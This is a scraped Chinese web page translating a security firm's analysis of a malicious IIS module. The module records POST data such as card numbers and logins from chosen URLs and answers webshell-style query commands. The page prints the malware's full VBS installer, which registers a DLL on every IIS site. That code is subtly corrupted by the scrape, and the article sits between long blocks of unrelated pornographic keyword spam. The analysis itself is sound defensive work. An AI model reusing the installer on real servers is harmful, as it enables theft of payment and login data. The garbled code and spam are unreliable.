精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

安全
最近,國外安全公司發現了一些以DLL動態鏈接庫形式存在的IIS模塊存在惡意風險,這些惡意模塊之所以受關注,很大原因是因為它們能躲過目前幾乎所有的反病毒產品,攻擊者借助這些模塊發送惡意POST數據包,并遵循恰當的機制以此來獲得敏感信息。

1、摘要

最近,國外安全公司發現了一些以DLL動態鏈接庫形式存在的IIS模塊存在惡意風險,這些惡意模塊之所以受關注,很大原因是因為它們能躲過目前幾乎所有的反病毒產品,攻擊者借助這些模塊發送惡意POST數據包,并遵循恰當的機制以此來獲得敏感信息。

這種惡意程序的目標不僅僅局限于銀行、電子商務網站的加密數據,同時還被用來獲取例如登錄賬戶及其他被發送到IIS實例上的數據(HTTP Header、MS-Chap令牌等)。同時要注意的是,這次發現的惡意軟件漏洞和之前報告的惡意軟件"Pony"沒有任何關系。Pony主要針對的是終端用戶,而這個IIS Module惡意程序主要是針對Web Server的。以下為報告譯文:

下面是這次發現的惡意程序在各大反病毒引擎上的檢查結果:

https://www.virustotal.com/en/file/587e784f8c54b49f25c01e0e8f71c205bd422e2b673fb7fbf28d721aa768e055/

事實證明,我所引用的這個DLL是一個IIS的原生安裝模塊,我想也該是時候對這種惡意程序進行一個總結了,之所以這么做,有以下2個原因:

a)在我寫這篇文章的時候,大部分的反病毒軟件都不會IIS目錄下的DLL模塊進行必要的檢查(通過設置白名單等),這導致了IIS的重要模塊被替換后無法被殺毒軟件捕獲到異常。雖然病毒的安裝程序(用于進行替換工作的程序)也只是被少數的反病毒軟件檢測出異常,因為這些檢測出異常的殺毒引擎大多數采取了"啟發式掃描";

b)我覺得這個惡意代碼非常的精巧。

2、介紹

讓我們先看一下這個病毒的安裝程序。程序允許帶許多參數變量以適應不同的環境:

-path : [惡意程序將被安裝的路徑]
-i : [目標URL地址, 例如 "/sensitive.aspx"
-u : [卸載惡意程序]
-is632 : [IIS6 32-Bit]
-is664 : [IIS6 64-Bit]

 

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

 

事實上,安裝程序非常簡單。它包含有四個內嵌的式DLL文件(在PE結構的資源節區中),在安裝的時候根據目標系統的版本進行動態選擇:

IIS6 + 32-Bit
IIS6 + 64-Bit
IIS7 + 32-Bit
IIS7 + 64-Bit

此外,這個ISN惡意程序也有一個VBS文件被嵌入到了PE的資源節區中(文件的內容請參考引用部分),這個VBS腳本文件用于安裝或者卸載用于替換IIS模塊的惡意DLL文件(即上面說到那4個DLL文件)。

一旦運行,ISN.exe將執行以下操作:

1. 將根據我們"-path"指定的位置,或者當前的工作目錄。把VBS復制到這個路徑下,為后面的安裝做準備,這個VBS文件將在安裝完成刪除,不會留下痕跡。
2. 創建一個配置文件([文件].cfg)在同一個目錄中。這個文件包含一個列表。
3. 惡意程序的目標URL列表。
4. 檢查IIS版本以及攻擊目標的操作系統架構。
5. 提取相應的DLL到安裝目錄(從PE的資源節區中)。
6. 調用VBS文件文件將惡意的DLL模塊安裝為IIS的模塊。(IIS只是通過DLL的文件名進行動態加載,即使這是一個惡意程序,DLL簽名技術在這里并不能起到防御作用)。

解壓運行后的情況如下圖:

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

在安裝的過程中會產生一些日志信息,這些信息有助于我們判斷安裝是否成功以及失敗的原因:

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

一旦成功安裝的模塊,它將監控在配置文件(isn.cfg)中指定的uri和dump(記錄)任何捕獲到的POST請求,將這些信息記錄到[fileName].log中。該模塊還將監控QUERY_STRING參數(IIS中的GPC參數,相當于PHP中的$_REQUEST),并可以接受一些攻擊者發送的命令(就像一個webshell一樣)。我編寫了一個簡單的IIS實例來演示這個過程如何發生。

3. 演示

如下我們可以看到,我已經創建了一個簡單的web表單,將模擬一個實際的電子商務網站。用戶輸入他們的名字和信用卡號碼和提交信息,然后腳本"/buy.aspx"返回用戶輸入的數據。

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

在本次演示中,我設置一個自簽名證書(self-signed certificate ),這樣所有的HTTP交互都通過SSL通信。

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

現在,所有的正常的HTTP業務通信都先和我們的惡意程序進行了交互,這里要注意的,我們必須在配置文件中明確指明我們要"跟蹤"的腳本文件(例如,buy.aspx)。這樣,當指定的.aspx腳本產生HTTP通信時,ISN.EXE會自動對捕獲到的數據進行記錄

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

我前面提到的,這個惡意程序可以像webshell那樣工作,原因是因為它同時監測QUERY_STRING參數并對其中包含的"特征字符串"進行匹配檢索。具體地說,它將尋找以下命令:

1. isn_getlog——的內容并返回。日志文件
2. isn_logdel——刪除并。日志文件
3. isn_logpath——返回的路徑并。日志文件

這些命令可以簡單地通過提供GET參數進行遠程發送。

"isn_getlog" example:

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

"isn_logdel" example:

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

"isn_logpath" example:

惡意軟件偽裝成IIS模塊加載 多數防毒產品免殺

4. 總結

總的來說,這個惡意軟件似乎沒有廣泛傳播,只有在一些個人的案例中出現。然而,極低的檢出率與惡意軟件的目標功能的結合使這中惡意程序成為一個非常現實的威脅。

Trustwave WebDefend和ModSecurity可用于在"感染路徑"的起點阻止這個惡意程序,它們可以檢測是否敏感的用戶數據,如信用卡號碼出現在出站數據中(outbound data)。ModSecurity的鏈式過濾規則可以很好的對付這個問題,保證數據從入站到出站每一個環節的安全。

5. 引用

isn.exe
http://www.findthatfile.com/search-1990823-fEXE/software-tools-download-isn-exe.htm
HASP.EXE
http://www.xrite.com/product_overview.aspx?ID=593&Action=support&SupportID=3339
installer (9/48) – https://www.virustotal.com/en/file/587e784f8c54b49f25c01e0e8f71c205bd422e2b673fb7fbf28d721aa768e055/analysis/
VBS File (0/49) – https://www.virustotal.com/en/file/688b80289a0c3771c7cee689c50a61b1c5215e8e5ac39a1120b3c7e4f4ada002/analysis/
IIS6 64-Bit (0/49) – https://www.virustotal.com/en/file/956ed56ecc574f68b637e22add7c8e3cb0deea3b1e0dd02abea165bfcb7e3786/analysis/
IIS6 32-Bit (0/47) – https://www.virustotal.com/en/file/9f501c052f2d4f4b0954f6060c7111f272ae29f9d88188d37c961c38e13e3905/analysis/
IIS7+ 64-Bit (0/46) – https://www.virustotal.com/en/file/c6847600910ab196652a38e94ecf592e645d43025d1d61b3710b2f715238307b/analysis/
IIS7+ 32-Bit (0/47) – https://www.virustotal.com/en/file/157174f0b9be66e3c9090c95efdd1dd23b19e42aa671758ebac5540a173f760c/analysis/
Content of VBS File – https://gist.github.com/jgrunzweig/7840987
  1. OPTION EXPLICIT 
  2.   
  3. DIM CRLF, TAB 
  4. DIM strServer 
  5. DIM objWebService 
  6. DIM WebSvcObj 
  7.   
  8. dim webID 
  9. dim DllName 
  10. dim strScriptMap 
  11. dim objVDir 
  12. dim arrScriptMaps 
  13. dim arrScriptMapsTmp 
  14. dim ISAPIlist 
  15. dim bAdd 
  16. dim bRemove 
  17. dim i 
  18. dim j 
  19. dim cc 
  20.   
  21. TAB  = CHR( 9 ) 
  22. CRLF = CHR( 13 ) & CHR( 10 ) 
  23. ISAPIlist = 0 
  24. bAdd = 0 
  25. bRemove = 0 
  26. cc = 0 
  27.   
  28. If Wscript.Arguments.Count < 2 Then 
  29.     If Wscript.Arguments.Count = 0 Then 
  30.         Wscript.Echo "cscript isn.vbs /add <Path\FileName> - add to all web sites" 
  31.         Wscript.Echo "cscript isn.vbs /remove <FileName> - remove from all web sites" 
  32.         Wscript.Echo "cscript isn.vbs /isapilist <ID> - list ISAPI for web site <ID>
  33.         Wscript.Echo "cscript isn.vbs /weblist - list web sites" 
  34.         Wscript.Echo "Example:" 
  35.         Wscript.Echo "cscript isn.vbs /add C:\WINDOWS\isn\isn.dll" 
  36.         Wscript.Echo "cscript isn.vbs /remove isn.dll" 
  37.         Wscript.Quit 
  38.     Else 
  39.         If Wscript.Arguments(0)="/weblist" Then 
  40.         &#039;list web sites id and names 
  41.         SET objWebService = GetObject( "IIS://localhost/W3SVC" ) 
  42.         EnumWebsites(objWebService) 
  43.         Wscript.Quit 
  44.         Else 
  45.         Wscript.Echo "wrong param" 
  46.         Wscript.Quit 
  47.         End If 
  48.     End If 
  49. Else 
  50.  If Wscript.Arguments(0)="/isapilist" Then 
  51.     webID = Wscript.Arguments(1) 
  52.     ISAPIlist = 1 
  53.  ElseIf Wscript.Arguments(0)="/add" Then 
  54.     bAdd = 1 
  55.     DllName = Wscript.Arguments(1) 
  56.  ElseIf Wscript.Arguments(0)="/remove" Then 
  57.     bRemove = 1 
  58.     DllName = Wscript.Arguments(1) 
  59.  End If 
  60. End If 
  61.   
  62. If ( (bAdd=0) And (bRemove=0) And (ISAPIlist=0) ) Then 
  63.         Wscript.Echo "Wrong params!" 
  64.         Wscript.Quit 
  65. End If 
  66.   
  67. If bAdd=1 Then 
  68. SET objWebService = GetObject( "IIS://localhost/W3SVC" ) 
  69. strScriptMap = "*,"+DllName+",4,All" 
  70. AddToWebsites(objWebService) 
  71. Set WebSvcObj = GetObject("IIS://LocalHost/W3SVC") 
  72. WebSvcObj.EnableExtensionFile("*.dll") 
  73. WebSvcObj.SetInfo 
  74. End If 
  75.   
  76. If bRemove=1 Then 
  77. SET objWebService = GetObject( "IIS://localhost/W3SVC" ) 
  78. RemoveFromWebsites(objWebService) 
  79. Set WebSvcObj = GetObject("IIS://LocalHost/W3SVC") 
  80. WebSvcObj.DisableExtensionFile("*.dll") 
  81. WebSvcObj.SetInfo 
  82. Wscript.Echo DllName + " deleted" 
  83. End If 
  84.   
  85. If ISAPIlist=1 Then 
  86. Set objVDir = GetObject("IIS://LocalHost/W3SVC/"+webID+"/Root") 
  87. arrScriptMaps = objVDir.Get("ScriptMaps") 
  88. For i = LBound(arrScriptMaps) to UBound(arrScriptMaps) 
  89. Wscript.Echo arrScriptMaps(i) 
  90. Next 
  91. Wscript.Quit 
  92. End If 
  93.   
  94. FUNCTION AddToWebsites( objWebService ) 
  95.     DIM objWebServer, strBindings 
  96.   
  97.     FOR EACH objWebServer IN objWebService 
  98.         IF objWebserver.Class = "IIsWebServer" THEN 
  99.     Set objVDir = GetObject("IIS://LocalHost/W3SVC/"+objWebserver.Name+"/Root") 
  100.     arrScriptMaps = objVDir.Get("ScriptMaps") 
  101.     arrScriptMapsarrScriptMapsTmp = arrScriptMaps 
  102.     ReDim Preserve arrScriptMaps(UBound(arrScriptMaps) + 1) 
  103.     j = LBound(arrScriptMaps) 
  104.     arrScriptMaps(j) = strScriptMap 
  105.     j = 0 
  106.      
  107.     For i = 1 to UBound(arrScriptMaps) 
  108.         arrScriptMaps(i)=arrScriptMapsTmp(j) 
  109.         jj = j+1 
  110.     Next 
  111.      
  112.     objVDir.Put "ScriptMaps", arrScriptMaps 
  113.     objVDir.SetInfo 
  114.      
  115.     Wscript.Echo "Add "+DllName+" to Web Site ID "+objWebserver.Name+" success!" 
  116.         END IF 
  117.     NEXT 
  118.   
  119. END FUNCTION 
  120.   
  121. FUNCTION RemoveFromWebsites( objWebService ) 
  122.     DIM objWebServer, strBindings 
  123.   
  124.     FOR EACH objWebServer IN objWebService 
  125.         IF objWebserver.Class = "IIsWebServer" THEN 
  126.          
  127.         Do 
  128.         Set objVDir = GetObject("IIS://LocalHost/W3SVC/"+objWebserver.Name+"/Root") 
  129.      
  130.         arrScriptMaps = objVDir.Get("ScriptMaps") 
  131.         arrScriptMapsarrScriptMapsTmp = arrScriptMaps 
  132.         cc=0 
  133.          
  134.         For i = LBound(arrScriptMapsTmp) to UBound(arrScriptMapsTmp) 
  135.             If InStr(arrScriptMapsTmp(i), DllName)>0 then 
  136.                 arrScriptMapsTmp(i) = "" 
  137.                 cccc=cc+1 
  138.                 Wscript.Echo "Found "+DllName+" in "+objWebserver.Name+", delete" 
  139.                &#039;exit for &#039;exit loop 
  140.             End If 
  141.         Next 
  142.          
  143.         If cc=0 Then 
  144.             Wscript.Echo DllName+" in "+objWebserver.Name+" NOT found" 
  145.             Exit Do 
  146.         End If 
  147.          
  148.         ReDim Preserve arrScriptMaps(UBound(arrScriptMaps)-cc) 
  149.          
  150.         j = LBound(arrScriptMapsTmp) 
  151.         for i = LBound(arrScriptMapsTmp) to UBound(arrScriptMapsTmp) 
  152.         If arrScriptMapsTmp(i)<>"" Then 
  153.             arrScriptMaps(j)=arrScriptMapsTmp(i) 
  154.             jj = j+1 
  155.         End If 
  156.         Next 
  157.          
  158.         objVDir.Put "ScriptMaps", arrScriptMaps 
  159.         objVDir.SetInfo 
  160.         Exit Do 
  161.     Loop While False 
  162.   
  163.         END IF 
  164.     NEXT 
  165.   
  166. END FUNCTION 
  167.   
  168. FUNCTION EnumWebsites( objWebService ) 
  169.     DIM objWebServer, strBindings 
  170.   
  171.     FOR EACH objWebServer IN objWebService 
  172.         IF objWebserver.Class = "IIsWebServer" THEN 
  173.             WScript.Echo _ 
  174.                 "Site ID = " & objWebserver.Name & CRLF & _ 
  175.                 "Comment = """ & objWebServer.ServerComment & """ " & CRLF & _ 
  176.                 "State   = " & State2Desc( objWebserver.ServerState ) &#039;& CRLF & _ 
  177.                 &#039;"LogDir  = " & objWebServer.LogFileDirectory & _ 
  178.                 &#039;"" 
  179.   
  180.             &#039; Enumerate the HTTP bindings (ServerBindings) and 
  181.             &#039; SSL bindings (SecureBindings) 
  182.             &#039;strBindings = EnumBindings( objWebServer.ServerBindings ) & _ 
  183.             &#039;              EnumBindings( objWebServer.SecureBindings ) 
  184.             &#039;IF NOT strBindings = "" THEN 
  185.             &#039;    WScript.Echo "IP Address" & TAB & _ 
  186.             &#039;                 "Port" & TAB & _ 
  187.             &#039;                 "Host" & CRLF & _ 
  188.             &#039;                 strBindings 
  189.             &#039;END IF 
  190.         END IF 
  191.     NEXT 
  192.   
  193. END FUNCTION 
  194.   
  195. FUNCTION EnumBindings( objBindingList ) 
  196.     DIM i, strIP, strPort, strHost 
  197.     DIM reBinding, reMatch, reMatches 
  198.     SET reBinding = NEW RegExp 
  199.     reBinding.Pattern = "([^:]*):([^:]*):(.*)" 
  200.   
  201.     FOR i = LBOUND( objBindingList ) TO UBOUND( objBindingList ) 
  202.         &#039; objBindingList( i ) is a string looking like IP:Port:Host 
  203.         SET reMatches = reBinding.Execute( objBindingList( i ) ) 
  204.         FOR EACH reMatch IN reMatches 
  205.             strIP = reMatch.SubMatches( 0 ) 
  206.             strPort = reMatch.SubMatches( 1 ) 
  207.             strHost = reMatch.SubMatches( 2 ) 
  208.   
  209.             &#039; Do some pretty processing 
  210.             IF strIP = "" THEN strIP = "All Unassigned" 
  211.             IF strHost = "" THEN strHost = "*" 
  212.             IF LEN( strIP ) < 8 THEN strIPstrIP = strIP & TAB 
  213.   
  214.             EnumBindingsEnumBindings = EnumBindings & _ 
  215.                            strIP & TAB & _ 
  216.                            strPort & TAB & _ 
  217.                            strHost & TAB & _ 
  218.                            "" 
  219.         NEXT 
  220.   
  221.         EnumBindingsEnumBindings = EnumBindings & CRLF 
  222.     NEXT 
  223.   
  224. END FUNCTION 
  225.   
  226. FUNCTION State2Desc( nState ) 
  227.     SELECT CASE nState 
  228.     CASE 1 
  229.         State2Desc = "Starting (MD_SERVER_STATE_STARTING)" 
  230.     CASE 2 
  231.         State2Desc = "Started (MD_SERVER_STATE_STARTED)" 
  232.     CASE 3 
  233.         State2Desc = "Stopping (MD_SERVER_STATE_STOPPING)" 
  234.     CASE 4 
  235.         State2Desc = "Stopped (MD_SERVER_STATE_STOPPED)" 
  236.     CASE 5 
  237.         State2Desc = "Pausing (MD_SERVER_STATE_PAUSING)" 
  238.     CASE 6 
  239.         State2Desc = "Paused (MD_SERVER_STATE_PAUSED)" 
  240.     CASE 7 
  241.         State2Desc = "Continuing (MD_SERVER_STATE_CONTINUING)" 
  242.     CASE ELSE 
  243.         State2Desc = "Unknown state" 
  244.     END SELECT 
  245.   
  246. END FUNCTION 
  247.  
  248. The Curious Case of the Malicious IIS Module  
  249. Reference From: http://blog.spiderlabs.com/2013/12/the-curious-case-of-the-malicious-iis-module.html 
  250. Translated By: LittleHann 

 

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2013-12-12 11:08:24

惡意軟件IIS服務器微軟

2023-08-30 07:19:49

2022-01-06 07:53:39

惡意軟件惡意程序網絡攻擊

2020-03-14 16:40:15

安全病毒黑客

2025-03-10 12:35:47

2025-04-09 11:36:23

2017-02-27 16:28:00

2022-09-01 10:28:10

惡意軟件惡意應用挖礦

2017-04-01 02:36:15

2022-06-05 13:59:01

惡意軟件安卓Android

2021-10-29 16:28:48

Android惡意軟件網絡攻擊

2022-01-17 15:13:52

惡意軟件操作系統

2022-03-17 11:49:55

惡意軟件安全工具釣魚攻擊

2024-07-22 13:56:02

2014-09-01 10:33:34

2019-01-07 08:07:13

2011-05-16 15:42:06

2022-03-22 15:58:18

惡意軟件BitRAT遠程訪問木馬

2021-04-30 07:49:58

FluBot惡意軟件木馬

2011-08-30 10:46:42

點贊
收藏

51CTO技術棧公眾號

黄色成人av网站| 国产高清日韩| 国产欧美日韩另类视频免费观看| 国产精品国语对白| 免费看一级大片| 99这里只有精品视频| 色综合咪咪久久| 7777在线视频| 欧美视频免费一区二区三区| 麻豆精品国产91久久久久久| 欧美国产日本高清在线| 久久精品成人av| 精品一区二区三区在线观看视频| 欧美日韩激情视频8区| 欧美大陆一区二区| 国产日本精品视频| 日皮视频在线观看| www.成人在线| 成人久久久久久久| yjizz国产| 一区二区在线| 亚洲无av在线中文字幕| 精品人妻二区中文字幕| av一区在线| 亚洲一区二区三区在线| 亚洲精品中文字幕在线| 日韩一级片免费在线观看| 日韩av电影一区| 久久久久久久久久久免费| 国产一级淫片久久久片a级| 国产精品白丝av嫩草影院| 在线观看不卡一区| 少妇无码av无码专区在线观看 | 国产精品66部| 国产精品久久综合av爱欲tv| 日本黄色片视频| 性xxxx欧美老肥妇牲乱| 国产亚洲成av人片在线观看桃| 黑森林av导航| 麻豆一区在线| 欧美日本不卡视频| 国产熟人av一二三区| 天堂av在线| 亚洲成人在线观看视频| 99er在线视频| 暖暖在线中文免费日本| 亚洲精品日产精品乱码不卡| 最新欧美日韩亚洲| 日本美女高清在线观看免费| 国产亚洲综合性久久久影院| 精品视频第一区| 人妻偷人精品一区二区三区| 国产精品系列在线播放| 亚洲综合日韩中文字幕v在线| 中文字幕二区三区| 免费成人在线视频观看| 国产精品91在线| 中文字幕在线日本| 日韩和的一区二区| 国产精品久久久久久久久久久不卡| 91在线视频在线观看| 亚洲免费综合| 欧美一级片久久久久久久| 成人在线免费看视频| 国产亚洲毛片在线| 欧美制服第一页| 国产午夜性春猛交ⅹxxx| 亚洲高清二区| 97在线看免费观看视频在线观看| 可以在线观看av的网站| 久久国产66| 国产精品精品一区二区三区午夜版| 国产成人精品777777| 日本亚洲最大的色成网站www| 国产精品第七十二页| 一本色道久久综合亚洲| 国产在线视频一区二区三区| 91福利视频导航| 亚洲精品国产精品国| 成人av先锋影音| 欧美日韩最好看的视频| 在线激情小视频| 亚洲九九爱视频| 丰满少妇久久久| 欧美中文字幕精在线不卡| 欧美三级午夜理伦三级中视频| 亚洲第一区第二区第三区| 99这里只有精品视频| 亚洲日本欧美日韩高观看| 成人精品一二三区| 精品1区2区3区4区| 国产91色在线| av免费在线观看不卡| 白白色 亚洲乱淫| 日韩欧美亚洲区| av毛片在线免费| 天天操天天干天天综合网| 午夜激情在线观看视频| 日韩精品成人| 亚洲日本成人女熟在线观看| 天天干中文字幕| 鲁大师成人一区二区三区 | 免费黄色片视频| 国内一区二区在线| 久久综合一区二区三区| 大片免费在线观看| 日韩欧美在线视频观看| 国产无遮挡猛进猛出免费软件| 红杏aⅴ成人免费视频| 中文字幕精品av| 黄色一级片免费看| 激情成人综合网| 久久99国产精品99久久| 大片免费在线看视频| 狠狠色狠狠色综合日日五| 中文字幕一区久久| 国产成人一区| 97在线观看视频国产| 97人妻精品一区二区三区软件| 91丨porny丨中文| 四虎精品欧美一区二区免费| 色豆豆成人网| 亚洲国产日韩精品在线| 欧美日韩黄色网| 久久一区中文字幕| 国产日韩欧美亚洲一区| 曰本三级在线| 欧美精品第1页| 老头老太做爰xxx视频| 99精品视频免费观看| 91入口在线观看| 国产成人l区| 欧美日韩一区二区三区视频| 国产色视频一区二区三区qq号| 欧美视频不卡| 91沈先生播放一区二区| 国产精品久久久久久福利| 欧美性感一类影片在线播放| 国产高清自拍视频| 国内精品久久久久久久影视麻豆| 成人国产精品一区二区| 午夜视频成人| 欧美色老头old∨ideo| 少妇精品一区二区三区| 国产精品久久久久久久免费软件 | 欧美成人午夜77777| 色综合久久久久久中文网| 国产色视频在线| 综合电影一区二区三区 | 欧美性视频在线播放| 高清av一区二区三区| 亚洲人成在线免费观看| 日韩综合在线观看| 久久久国产精华| 免费午夜视频在线观看| 免费观看久久av| 欧美一级片免费在线| 精品美女视频在线观看免费软件| 日韩欧美亚洲一二三区| 90岁老太婆乱淫| 日韩激情在线观看| 亚洲成人蜜桃| 亚洲精品三区| 欧美日本高清视频| 黄色一级大片在线免费看国产一| 亚洲电影在线免费观看| 中文在线一区二区三区| 久久激情婷婷| 亚洲电影一二三区| 国产精品成人3p一区二区三区| 另类图片亚洲另类| 亚洲美女福利视频| 欧美日韩美女在线观看| 亚洲区自拍偷拍| 久久99久久久久| 亚洲wwwav| 性欧美1819sex性高清大胸| 精品奇米国产一区二区三区| 国产无遮挡又黄又爽| 2017欧美狠狠色| 国产又大又黄又粗又爽| 先锋资源久久| 国产精品一区而去| 日韩伦理三区| 久久亚洲国产成人| 手机av免费在线观看| 在线免费观看日本一区| 日韩精品一区二区亚洲av性色| 暴力调教一区二区三区| 亚洲高清免费在线观看| 亚洲香蕉网站| 日韩欧美精品在线不卡| 日韩一区二区三区精品| 青青草原一区二区| 国内精品久久久久久野外| 日韩av中文字幕在线播放| 中文字幕 亚洲视频| 一区二区欧美国产| 男生草女生视频| 国产精品影音先锋| 激情六月丁香婷婷| 亚洲一区二区三区无吗| 裸模一区二区三区免费| 99久久这里有精品| 欧美与欧洲交xxxx免费观看| 成人在线app| 亚洲精品视频免费在线观看| 国产亲伦免费视频播放| 色噜噜狠狠成人网p站| 青青草成人免费| 欧美国产激情二区三区| 制服丝袜在线第一页| 麻豆精品一区二区三区| 狠狠爱免费视频| 国产精品啊v在线| 中文字幕人成一区| 久久综合亚洲| 好吊妞www.84com只有这里才有精品| 黄色成人小视频| 国产91精品久| 欧洲精品二区| 日韩视频欧美视频| 国产福利第一视频在线播放| 亚洲福利在线视频| 国产高中女学生第一次| 欧美日韩精品福利| 波多野结衣毛片| 欧美色视频日本版| 国产无遮挡又黄又爽又色| 亚洲最大的成人av| 丰满少妇被猛烈进入一区二区| 国产精品入口麻豆原神| 亚洲a v网站| 久久中文娱乐网| 青青草视频播放| 成人黄色小视频在线观看| 亚洲精品乱码久久久久久9色| 精久久久久久久久久久| 中日韩av在线播放| 久久国产精品99久久人人澡| av无码精品一区二区三区| 亚欧成人精品| 成人在线免费观看av| aa国产精品| 每日在线更新av| 亚洲一区二区免费看| 九一国产精品视频| 99精品久久久| 91av资源网| 久久夜色精品| 99久久国产宗和精品1上映| 另类av一区二区| 麻豆传传媒久久久爱| 日韩不卡一区二区三区| 性欧美videossex精品| 欧美aaaaaa午夜精品| 天天干天天操天天玩| 久久99久久精品| 一起草最新网址| 东方aⅴ免费观看久久av| 岛国大片在线免费观看| 成人涩涩免费视频| 亚洲国产果冻传媒av在线观看| ww亚洲ww在线观看国产| 熟女俱乐部一区二区视频在线| 久久精品人人爽人人爽| 天美传媒免费在线观看| 一区二区在线看| 久久夜靖品2区| 91福利视频网站| 99热这里只有精品99| 精品福利在线导航| 欧美日韩伦理片| 久久精品国产v日韩v亚洲| 人人澡人人添人人爽一区二区| 97成人精品视频在线观看| 高清成人在线| 91午夜在线播放| 久久中文资源| 亚洲欧洲精品一区二区三区波多野1战4| 亚洲午夜精品一区 二区 三区| 3d动漫一区二区三区| 日本免费新一区视频| 男人操女人下面视频| www激情久久| 黄色录像一级片| 五月综合激情日本mⅴ| 在线永久看片免费的视频| 欧美放荡的少妇| 性猛交xxxx| 俺去亚洲欧洲欧美日韩| 女人让男人操自己视频在线观看 | 日本一级淫片演员| 亚洲高清免费| 在线观看免费成人av| 国产成人免费视频一区| 久久精品成人av| 亚洲免费观看高清完整版在线| 国产成人免费看| 91精品国产综合久久福利软件| 亚洲av电影一区| 久久久久999| 黄色成人免费网| y111111国产精品久久婷婷| 精品久久电影| 成人免费观看cn| 国内精品视频666| 免费污网站在线观看| 亚洲一区在线视频| 91九色蝌蚪91por成人| 亚洲精品短视频| jizzjizz亚洲| 国产精品入口免费视| 欧美一区二区三区久久| 青青草综合在线| 久久se精品一区精品二区| 五级黄高潮片90分钟视频| 亚洲综合色网站| 97人妻一区二区精品免费视频| 国产亚洲激情在线| 欧美成人免费电影| 精品无码久久久久国产| 欧美三级视频| 在线观看视频你懂得| 国产精品欧美一区喷水| 中文字幕69页| 日韩国产精品一区| √最新版天堂资源网在线| 亚洲xxxxx电影| 9999国产精品| 国产一区二区视频免费在线观看| 成人av在线影院| 国产大片中文字幕| 精品少妇一区二区三区| 污片在线免费观看| 7777精品伊久久久大香线蕉语言| 欧美大黑bbbbbbbbb在线| 国产又大又黄又粗的视频| 久久久久久久电影| 国产精品第5页| 亚洲欧美国产视频| 性孕妇free特大另类| 久久资源亚洲| 国产精品入口| 加勒比一区二区| 在线观看网站黄不卡| 成年人视频免费在线观看| 国产精品久久av| 欧美一区二区三| 91插插插插插插插插| 国产精品日韩成人| 91亚洲国产成人精品一区| 日韩视频在线免费观看| 色综合一区二区日本韩国亚洲| 亚洲午夜精品一区二区三区| 久久精品免费看| 国产成人自拍网站| 日韩精品综合一本久道在线视频| 啦啦啦中文在线观看日本| 国产伦精品一区二区三区高清 | 欧美极品欧美精品欧美视频 | 国产粉嫩在线观看| 精品国产乱码久久久久| 午夜一区二区三区不卡视频| 青青草视频成人| 91精品福利视频| 日韩免费网站| 99re国产视频| 国产欧美二区| 久久久久久成人网| 在线播放国产精品二区一二区四区| 精品麻豆一区二区三区| 国产精品果冻传媒潘| 老鸭窝毛片一区二区三区| 日韩av毛片在线观看| 日韩欧美黄色影院| 波多视频一区| 中文字幕免费高| 成人在线视频首页| 一二三区免费视频| 久久久精品日本| 全国精品免费看| 九九热精品在线播放| 亚洲曰韩产成在线| 国产在线日本| 91入口在线观看| 日韩av中文字幕一区二区三区| 天天干中文字幕| 在线看国产精品| 国产精品欧美大片| 一区二区三区入口| 亚洲国产精品一区二区久久| 可以在线观看的av| 91入口在线观看| 日本欧美大码aⅴ在线播放| 男女免费视频网站| 在线观看国产精品91| 91蜜桃臀久久一区二区| 免费一级特黄录像| 亚洲午夜在线电影|